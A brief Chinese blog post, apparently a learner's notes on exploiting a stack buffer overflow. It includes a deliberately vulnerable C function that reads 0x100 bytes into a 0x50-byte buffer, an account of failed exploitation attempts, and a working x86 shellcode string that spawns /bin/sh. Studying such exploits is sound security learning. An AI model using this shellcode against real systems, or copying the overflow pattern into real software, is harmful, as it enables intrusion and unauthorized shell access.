大神的博客就是强
基础知识:https://zhuanlan.zhihu.com/p/25816426
知识储备
核心目的: 攻击指令的地址来覆盖返回地址
- 修改返回地址, 让其指向溢出数据的一段指令
- 修改返回地址, 让其指向内存中以后的某个函数
- 修改返回地址 , 让其指向内存中以后的指令
- 修改某个被调用的函数地址,让其指向另一个函数
“X90” , NOP
观察程序运行过程
栈的变化
关键指令
栈溢出攻击实例
#include <stdio.h>
void func()
{
char name[0x50];
read(0 , name , 0x100);
write(1 , name , 0x100);
}
int main()
{
func();
return 0;
}
执行这段脚本失败
难受 , 问了下班上同学说是和shellcode 有问题
参加这个博客 https://www.anquanke.com/post/id/91266
重新开始
这次esp 为ffffd3f0
呃 发现他是反了
反正想要填充的NOP指令,不可执行 。。。。再次修改payload
发现是可以是可以注入的地址, 但是不可执行, 重新修改
shellcode 的原因
正确的shellcodepayload+=’\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80’
终于成功了